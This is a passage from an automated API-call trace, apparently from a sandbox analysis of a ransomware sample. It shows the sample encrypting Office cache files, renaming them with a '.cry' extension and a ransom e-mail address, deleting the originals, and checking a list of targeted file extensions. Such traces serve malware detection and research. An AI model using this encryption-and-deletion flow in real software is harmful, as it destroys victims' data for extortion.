0x0 [0035.892] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x646, lpOverlapped=0x0) returned 1 [0035.983] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x650, lpOverlapped=0x0) returned 1 [0035.983] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.983] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.983] SetEndOfFile (hFile=0x180) returned 1 [0035.984] CloseHandle (hObject=0x180) returned 1 [0035.984] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.984] SetEndOfFile (hFile=0x17c) returned 1 [0035.985] CloseHandle (hObject=0x17c) returned 1 [0035.985] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.985] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0035.989] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.989] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.989] lstrlenW (lpString=".doc") returned 4 [0035.989] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.989] lstrlenW (lpString=".docx") returned 5 [0035.989] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.989] lstrlenW (lpString=".pdf") returned 4 [0035.989] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.989] lstrlenW (lpString=".xls") returned 4 [0035.989] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.989] lstrlenW (lpString=".xlsx") returned 5 [0035.989] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.989] lstrlenW (lpString=".ppt") returned 4 [0035.989] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.989] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.989] lstrlenW (lpString=".zip") returned 4 [0035.989] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.989] lstrlenW (lpString=".rar") returned 4 [0035.989] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.989] lstrlenW (lpString=".bz2") returned 4 [0035.989] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.989] lstrlenW (lpString=".7z") returned 3 [0035.989] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.989] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.989] lstrlenW (lpString=".dbf") returned 4 [0035.989] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.989] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.989] lstrlenW (lpString=".1cd") returned 4 [0035.989] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.990] lstrlenW (lpString=".jpg") returned 4 [0035.990] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.990] lstrlenW (lpString=".doc") returned 4 [0035.990] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".docx") returned 5 [0035.990] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.990] lstrlenW (lpString=".pdf") returned 4 [0035.990] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".xls") returned 4 [0035.990] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".xlsx") returned 5 [0035.990] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.990] lstrlenW (lpString=".ppt") returned 4 [0035.990] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.990] lstrlenW (lpString=".zip") returned 4 [0035.990] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.990] lstrlenW (lpString=".rar") returned 4 [0035.990] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".bz2") returned 4 [0035.990] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString=".7z") returned 3 [0035.990] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.990] lstrlenW (lpString=".dbf") returned 4 [0035.990] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.990] lstrlenW (lpString=".1cd") returned 4 [0035.990] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.990] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0035.990] lstrlenW (lpString=".jpg") returned 4 [0035.990] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.991] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.991] lstrlenW (lpString="branding.xml") returned 12 [0035.991] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.991] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=596341) returned 1 [0035.991] CloseHandle (hObject=0x18c) returned 1 [0035.991] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 0x2020 [0035.991] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.992] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.992] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.992] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.992] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.992] GetLastError () returned 0x0 [0035.992] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x91975, lpOverlapped=0x0) returned 1 [0036.053] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0036.397] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.397] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0036.397] SetEndOfFile (hFile=0x17c) returned 1 [0036.397] CloseHandle (hObject=0x17c) returned 1 [0036.408] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.408] SetEndOfFile (hFile=0x18c) returned 1 [0036.413] CloseHandle (hObject=0x18c) returned 1 [0036.413] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.413] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0036.413] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.413] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.413] lstrlenW (lpString=".doc") returned 4 [0036.413] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.413] lstrlenW (lpString=".docx") returned 5 [0036.413] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.413] lstrlenW (lpString=".pdf") returned 4 [0036.413] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.413] lstrlenW (lpString=".xls") returned 4 [0036.413] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.413] lstrlenW (lpString=".xlsx") returned 5 [0036.413] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.413] lstrlenW (lpString=".ppt") returned 4 [0036.414] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.414] lstrlenW (lpString=".zip") returned 4 [0036.414] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.414] lstrlenW (lpString=".rar") returned 4 [0036.414] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.414] lstrlenW (lpString=".bz2") returned 4 [0036.414] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.414] lstrlenW (lpString=".7z") returned 3 [0036.414] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.414] lstrlenW (lpString=".dbf") returned 4 [0036.414] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.414] lstrlenW (lpString=".1cd") returned 4 [0036.414] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.414] lstrlenW (lpString=".jpg") returned 4 [0036.414] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.414] lstrlenW (lpString=".doc") returned 4 [0036.414] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.414] lstrlenW (lpString=".docx") returned 5 [0036.414] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.414] lstrlenW (lpString=".pdf") returned 4 [0036.415] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.415] lstrlenW (lpString=".xls") returned 4 [0036.415] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.415] lstrlenW (lpString=".xlsx") returned 5 [0036.415] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.415] lstrlenW (lpString=".ppt") returned 4 [0036.415] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.415] lstrlenW (lpString=".zip") returned 4 [0036.415] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.415] lstrlenW (lpString=".rar") returned 4 [0036.415] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.415] lstrlenW (lpString=".bz2") returned 4 [0036.415] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.415] lstrlenW (lpString=".7z") returned 3 [0036.415] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.415] lstrlenW (lpString=".dbf") returned 4 [0036.415] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.415] lstrlenW (lpString=".1cd") returned 4 [0036.415] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.415] lstrlenW (lpString=".jpg") returned 4 [0036.415] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.416] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.416] lstrlenW (lpString="Office32WW.xml") returned 14 [0036.416] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.422] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=4274) returned 1 [0036.422] CloseHandle (hObject=0x18c) returned 1 [0036.422] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0036.422] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.422] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.423] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.423] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.423] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0036.423] GetLastError () returned 0x0 [0036.423] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0036.513] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0036.514] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.514] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0036.514] SetEndOfFile (hFile=0x17c) returned 1 [0036.514] CloseHandle (hObject=0x17c) returned 1 [0036.515] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.515] SetEndOfFile (hFile=0x18c) returned 1 [0036.515] CloseHandle (hObject=0x18c) returned 1 [0036.516] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.516] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0036.516] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.516] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.516] lstrlenW (lpString=".doc") returned 4 [0036.516] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.516] lstrlenW (lpString=".docx") returned 5 [0036.516] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.516] lstrlenW (lpString=".pdf") returned 4 [0036.516] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.516] lstrlenW (lpString=".xls") returned 4 [0036.516] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.516] lstrlenW (lpString=".xlsx") returned 5 [0036.516] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.516] lstrlenW (lpString=".ppt") returned 4 [0036.516] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.516] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.516] lstrlenW (lpString=".zip") returned 4 [0036.516] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.516] lstrlenW (lpString=".rar") returned 4 [0036.517] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString=".bz2") returned 4 [0036.517] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString=".7z") returned 3 [0036.517] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.517] lstrlenW (lpString=".dbf") returned 4 [0036.517] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.517] lstrlenW (lpString=".1cd") returned 4 [0036.517] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.517] lstrlenW (lpString=".jpg") returned 4 [0036.517] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.517] lstrlenW (lpString=".doc") returned 4 [0036.517] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString=".docx") returned 5 [0036.517] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.517] lstrlenW (lpString=".pdf") returned 4 [0036.517] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString=".xls") returned 4 [0036.517] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString=".xlsx") returned 5 [0036.517] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.517] lstrlenW (lpString=".ppt") returned 4 [0036.517] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.517] lstrlenW (lpString=".zip") returned 4 [0036.517] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.517] lstrlenW (lpString=".rar") returned 4 [0036.517] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.518] lstrlenW (lpString=".bz2") returned 4 [0036.518] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.518] lstrlenW (lpString=".7z") returned 3 [0036.518] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.518] lstrlenW (lpString=".dbf") returned 4 [0036.518] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.518] lstrlenW (lpString=".1cd") returned 4 [0036.518] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.518] lstrlenW (lpString=".jpg") returned 4 [0036.518] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.518] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.518] lstrlenW (lpString="PrjProrWW.xml") returned 13 [0036.518] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.519] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=6421) returned 1 [0036.519] CloseHandle (hObject=0x18c) returned 1 [0036.519] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 0x2020 [0036.519] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.519] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.519] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.519] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.519] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all 